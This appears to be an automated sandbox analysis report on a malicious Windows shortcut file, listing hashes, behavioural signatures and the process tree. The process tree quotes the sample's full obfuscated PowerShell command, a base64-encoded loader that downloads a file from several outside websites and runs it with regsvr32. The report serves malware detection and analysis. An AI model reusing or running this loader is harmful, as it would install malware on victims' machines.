Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20/11/2024, 23:37
Static task
static1
Behavioral task
behavioral1
Sample
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk
-
Size
3KB
-
MD5
9d6cf11e83532493480dd167924d2165
-
SHA1
b83c252564e2cc4b1b17d9279fe42bf3cf6b6326
-
SHA256
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf
-
SHA512
eb9b02ebc40b7de47cb72dc18b8685f3c64cb880b914ea5f90ab21fed543ec7769ada6ba11173b769f9fb23e9e29aa98499d932c9b7588d6bb5c72dae2d8351e
Score
6/10
Malware Config
Signatures
-
pid Process 1984 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1984 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2092 wrote to memory of 1984 2092 cmd.exe 29 PID 2092 wrote to memory of 1984 2092 cmd.exe 29 PID 2092 wrote to memory of 1984 2092 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'ZZvPNSKeK+IuicWBL99TDQVa5lqEmN8IplPY0QcqwUAWg3Kb+66Pjv+f2Sj4d/snwI1Cv4na';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-